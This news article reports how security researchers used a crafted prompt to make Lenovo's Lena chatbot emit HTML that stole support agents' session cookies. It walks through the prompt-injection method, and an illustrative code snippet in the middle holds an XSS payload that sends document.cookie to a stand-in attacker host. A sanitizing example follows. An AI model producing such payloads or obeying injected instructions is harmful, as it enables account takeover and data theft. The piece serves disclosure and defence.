Lenovo's Lena AI chatbot could be turned into a secret hacker with just one question
What if hackers could turn your AI chatbot against you?

- Researchers found a way to trick Lenovo's AI chatbot Lena
- Lena shared active session cookies with the researchers
- Malicious prompts could be used for a wide variety of attacks
Lena, the ChatGPT-powered chatbot featured on Lenovo’s website, could be turned into a malicious insider, spilling company secrets or running malware, with nothing more than a carefully crafted prompt, experts have warned.
Security researchers at Cybernews managed to use the chatbot to obtain active session cookies belonging to human customer support agents, which would essentially let an attacker take over their accounts, access sensitive data, and potentially pivot elsewhere in the corporate network.
“The discovery highlights multiple security issues: improper user input sanitization, improper chatbot output sanitization, the web server not verifying content produced by the chatbot, running unverified code, and loading content from arbitrary web resources. This leaves a lot of options for Cross-Site Scripting (XSS) attacks,” the researchers said in their report.
"Massive security oversight"
At the heart of the problem, they said, is the fact that chatbots are “people pleasers”. Without proper guardrails baked in, they will do as they’re told, and they’re not able to distinguish a benign request from a malicious one.
In this instance, Cybernews researchers wrote a 400-word prompt that asked the chatbot to generate its answer in HTML.
The response contained hidden instructions to load resources from a server under the attackers’ control and to send data from the client’s browser along with that request.
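To illustrate the class of attack being described, here is a generic XSS-style sketch of what can happen when a support console renders chatbot output as raw HTML. This is not the researchers’ actual payload; the attacker domain, element ID, and event handler are all hypothetical:

```typescript
// Illustrative sketch only: a classic cookie-exfiltration pattern, assuming the
// chatbot's HTML answer is inserted into the page without any sanitization.

// Suppose the manipulated chatbot returns something like this as its "HTML answer":
const chatbotHtml = `
  <p>Here is the product information you asked for.</p>
  <img src="https://attacker.example/missing.png"
       onerror="new Image().src =
         'https://attacker.example/collect?c=' + encodeURIComponent(document.cookie)">
`;

// A support console that trusts the output and renders it directly is exposed:
const panel = document.getElementById("chat-panel") as HTMLElement;
panel.innerHTML = chatbotHtml; // the broken image's onerror handler runs and
                               // ships the agent's cookies off to the attacker
```

Because the injected handler runs inside the support agent’s browser session, it can attach whatever the attacker’s script can read, which is why session cookies were an obvious target.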
They also stressed that, while their tests resulted in session cookie theft, the end result could be pretty much anything.
“This is not limited to stealing cookies. It may also be possible to execute some system commands, which could allow for the installation of backdoors and lateral movement to other servers and computers on the network,” Cybernews explained.
"We didn’t attempt any of this,” they added.
After Cybernews reported its findings, which the researchers described as a “massive security oversight” with potentially devastating consequences, Lenovo said it had “protected its systems”, without detailing exactly what was done.
The researchers urged all companies using chatbots to assume all outputs are “potentially malicious” and to act accordingly.
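In practice, acting accordingly means never handing model output straight to the browser as HTML. Below is a minimal sketch of that advice, assuming a web front end like the one described above; the function and element names are illustrative, and a vetted allow-list sanitizer would be preferable in production:

```typescript
// Treat every chatbot reply as untrusted input: escape it (or render it as plain
// text) before it reaches the DOM, so injected markup is displayed, not executed.

function escapeHtml(untrusted: string): string {
  return untrusted
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hypothetical reply coming back from the chatbot backend:
const chatbotReply = '<img src=x onerror="alert(1)"> Here is your answer.';

const panel = document.getElementById("chat-panel") as HTMLElement;

// Safest option: render as plain text so markup is never interpreted.
panel.textContent = chatbotReply;

// If HTML insertion is unavoidable, escape (or sanitize with an allow-list) first.
panel.innerHTML = escapeHtml(chatbotReply);
```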